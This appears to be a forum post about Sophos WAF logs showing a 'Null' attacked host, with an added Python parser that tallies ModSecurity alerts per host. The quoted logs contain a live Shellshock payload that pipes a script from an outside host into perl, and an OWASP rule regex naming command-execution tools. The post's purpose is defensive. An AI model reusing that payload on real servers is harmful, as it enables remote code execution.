When looking at the Details section of Webserver Protection, under Logging and Reporting, if I list the top virtual hosts attacked, one host is marked as Null.
I looked at the log file for the IP that attacked the Null host.
/var/log/reverseproxy.log:2014:10:21-02:44:41 Sophos reverseproxy: [Tue Oct 21 02:44:41.777818 2014] [security2:error] [pid 8057:tid 3979971440] [client 66.90.X.X] ModSecurity: Warning. Pattern match "^\\(\\s*\\)\\s+{" at REQUEST_HEADERS:Cookie. [file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "258"] [id "969990"] [msg "CVE-2014-6271 - Bash Attack"] [data "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"] [severity "CRITICAL"] [tag "CVE-2014-6271"] [hostname "www.Acme.com"] [uri "/"] [unique_id "VEYA2awQHQEAAB95bDcAAADS"]
Also
-------------------------------
/var/log/reverseproxy.log:2014:10:21-02:44:42 sophos reverseproxy: [Tue Oct 21 02:44:42.578851 2014] [security2:error] [pid 8057:tid 3979971440] [client 66.90.X.X] ModSecurity: Warning. Pattern match "(?:\\b(?[[:(]]?:n(?:et(?:\\b\\W+?\\blocalgroup|\\.exe)|(?:map|c)\\.exe)|t(?:racer(?[:$]ute|t)|elnet\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo\\b\\W*?\\by+)\\b|c(?:md(?[[:(]]?:\\.exe|32)\\b|\\b\\W*?\\/c)|d(?:\\b\\W*?[\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\ ..." at REQUEST_COOKIES_NAMES:curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl. [file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | perl found within REQUEST_COOKIES_NAMES:curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl: curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/
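As an added example (not Sophos code or code from the post), this Python snippet parses the bracketed fields of ModSecurity error-log entries like the ones above and tallies rule hits per virtual host. It assumes that entries with no hostname field are what the report shows as Null, which the post does not confirm; the sample entries are constructed from the post with the payload truncated.

```python
import re
from collections import Counter

# ModSecurity (security2) error-log entries carry their details as bracketed [key "value"] fields.
# A value may contain escaped quotes (\"), so each character is either a non-quote or an escape pair.
FIELD_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')
CLIENT_RE = re.compile(r'\[client ([^\]\s]+)\]')

def parse_modsec_entry(line):
    """Return the quoted fields (id, msg, hostname, uri, ...) of one entry, plus 'client' and a 'tags' list."""
    entry = {"tags": []}
    m = CLIENT_RE.search(line)
    if m:
        entry["client"] = m.group(1)
    for key, value in FIELD_RE.findall(line):
        value = value.replace('\\"', '"')  # undo ModSecurity's quote escaping
        if key == "tag":                    # [tag ...] repeats; collect them all
            entry["tags"].append(value)
        else:
            entry[key] = value
    return entry

def alerts_by_vhost(lines):
    """Count rule hits per virtual host; entries without a hostname field go under 'Null' (assumption)."""
    counts = Counter()
    for line in lines:
        entry = parse_modsec_entry(line)
        if "id" not in entry:               # not a rule hit (e.g. a plain notice line)
            continue
        counts[entry.get("hostname") or "Null"] += 1
    return counts

# Constructed sample entries modeled on the post; the payload in [data ...] is truncated on purpose.
SAMPLE_LOG = [
    r'2014:10:21-02:44:41 reverseproxy: [Tue Oct 21 02:44:41 2014] [security2:error] [pid 8057:tid 1] '
    r'[client 66.90.X.X] ModSecurity: Warning. Pattern match "^\\(\\s*\\)\\s+{" at REQUEST_HEADERS:Cookie. '
    r'[file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "258"] [id "969990"] '
    r'[msg "CVE-2014-6271 - Bash Attack"] [data "() { :; }; ..."] [severity "CRITICAL"] '
    r'[tag "CVE-2014-6271"] [hostname "www.Acme.com"] [uri "/"] [unique_id "VEYA2awQHQEAAB95bDcAAADS"]',
    # Same rule hit, but the request matched no virtual host, so no [hostname ...] field was logged.
    r'2014:10:21-02:44:42 reverseproxy: [Tue Oct 21 02:44:42 2014] [security2:error] [pid 8057:tid 1] '
    r'[client 66.90.X.X] ModSecurity: Warning. Pattern match "^\\(\\s*\\)\\s+{" at REQUEST_HEADERS:Cookie. '
    r'[file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "258"] [id "969990"] '
    r'[msg "CVE-2014-6271 - Bash Attack"] [severity "CRITICAL"] [tag "CVE-2014-6271"] [uri "/"]',
    # A non-ModSecurity line, which the tally must skip.
    r'2014:10:21-02:45:00 reverseproxy: [Tue Oct 21 02:45:00 2014] [mpm_event:notice] [pid 1:tid 1] resuming normal operations',
]

if __name__ == "__main__":
    for host, n in alerts_by_vhost(SAMPLE_LOG).items():
        print(f"{host}: {n} rule hit(s)")
```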